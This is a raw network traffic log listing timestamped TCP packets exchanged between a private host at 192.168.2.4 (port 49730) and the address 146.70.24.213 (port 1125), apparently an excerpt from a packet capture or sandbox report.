Oct 11, 2024 16:53:48.784585953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784595013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784596920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784605980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784616947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784626007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784630060 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784640074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784645081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784652948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784668922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784686089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784689903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784701109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784709930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784719944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784729004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784737110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784754992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784805059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784816027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784826040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784836054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784847975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784862995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784893990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784912109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784921885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784931898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784940958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784940958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784951925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784953117 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.784965038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.784986973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785003901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785018921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785029888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785039902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785048962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785070896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785084963 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785096884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785108089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785118103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785129070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785151958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785185099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785188913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785198927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785212040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785224915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785237074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785242081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785248041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785295010 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785305023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785312891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785326004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785339117 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785351038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785360098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785365105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785387039 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785592079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785605907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785619020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785630941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785644054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785645962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785657883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785670042 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785675049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785682917 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785715103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.785897017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785909891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785922050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.785931110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786000013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786032915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786048889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786061049 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786067963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786076069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786082029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786088943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786094904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786102057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786109924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786123991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786178112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786206961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786237955 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786266088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786279917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786287069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786292076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786307096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786319017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786324024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786334991 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786362886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786376953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786390066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786406994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786432028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786720991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786734104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786747932 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786777973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786818981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786832094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786844015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786856890 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.786865950 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.786891937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788256884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788276911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788311958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788328886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788341999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788355112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788367033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788372993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788382053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788392067 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788424015 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788584948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788597107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788609982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788623095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788645029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788671017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788686991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788701057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788712978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788726091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788733959 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788738966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788752079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788760900 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788765907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788780928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788794041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788796902 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788808107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788810968 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788820982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788834095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788846970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788856983 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788860083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788875103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788886070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788888931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.788902044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.788933039 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875109911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875169992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875189066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875204086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875217915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875230074 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875243902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875248909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875248909 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875256062 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875271082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875286102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875300884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875317097 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875328064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875328064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875329018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875343084 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875349045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875360966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875372887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875406981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875416994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875427961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875457048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875510931 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875538111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875612020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875624895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875660896 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875665903 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875679970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875691891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875721931 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875726938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875726938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875736952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875790119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875796080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875808954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875822067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875834942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875845909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.875852108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.875884056 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876343966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876430035 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876447916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876461029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876475096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876488924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876498938 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876504898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876521111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876562119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876562119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876627922 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876642942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876657009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876668930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876684904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876698971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876710892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876710892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876713991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876738071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876753092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876756907 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876768112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876784086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876799107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876810074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876810074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876815081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876831055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876847029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876854897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876863003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876874924 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876918077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876918077 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.876934052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876957893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.876971006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877005100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877005100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877049923 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877064943 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877078056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877099991 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877103090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877114058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877125978 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877139091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877151012 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877159119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877159119 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877165079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877187014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877202034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877216101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877230883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877233028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877233028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877247095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877285004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877285004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877293110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877307892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877324104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877340078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877355099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877368927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877382040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877382040 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877384901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877420902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877422094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877437115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877460003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877473116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877486944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877501011 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877506018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877506018 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877516031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877531052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877567053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877567053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877590895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877604961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877620935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877634048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877661943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877661943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877679110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877692938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877716064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.877758980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.877758980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879199028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879329920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879343987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879359961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879375935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879400969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879400969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879414082 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879431963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879447937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879465103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879486084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879486084 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879575014 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879591942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879607916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879628897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879631996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879650116 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879654884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879672050 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879688025 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879703999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879710913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879722118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879729033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.879740953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.879757881 CEST	1125	49730	146.70.24.213	192.168.2.4
